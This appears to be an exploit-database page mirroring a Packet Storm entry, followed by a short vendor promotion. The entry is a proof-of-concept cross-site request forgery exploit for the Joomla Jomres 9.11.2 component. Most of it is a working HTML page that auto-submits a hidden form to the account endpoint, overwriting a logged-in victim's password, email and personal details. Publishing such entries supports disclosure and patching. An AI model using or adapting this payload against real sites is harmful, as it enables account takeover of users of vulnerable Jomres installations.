Lucene search
K

Joomla Jomres 9.11.2 Cross Site Request Forgery

🗓️ 18 Jun 2018 00:00:00Reported by Borna NematzadehType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 44 Views

Joomla Jomres 9.11.2 Cross Site Request Forgery on account detail

Code
`# Exploit Title: Joomla!Component jomres 9.11.2 - Cross site request forgery  
# Date: 2018-06-15  
# Exploit Author: L0RD  
# Vendor Homepage: https://www.jomres.net/  
# Software link: https://extensions.joomla.org/extension/jomres/  
# Software Download: https://github.com/WoollyinWalesIT/jomres/releases/download/9.11.2/jomres.zip  
# Version: 9.11.2  
# Tested on: Kali linux  
===================================================  
# POC :  
  
<html>  
<head>  
<title>CSRF POC</title>  
</head>  
<body>  
<form action="http://127.0.0.1/jomres/index.php?cmd=account/index" method="POST">  
<input type="hidden" name="password" value="decode" />  
<input type="hidden" name="password_verify" value="decode" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="first_name" value="decode" />  
<input type="hidden" name="last_name" value="test" />  
<input type="hidden" name="company" value="test" />  
<input type="hidden" name="vat_no" value="100000000" />  
<input type="hidden" name="address1" value="test1" />  
<input type="hidden" name="address2" value="test2" />  
<input type="hidden" name="city" value="New York" />  
<input type="hidden" name="county" value="test" />  
<input type="hidden" name="postalcode" value="100001" />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
===================================================  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation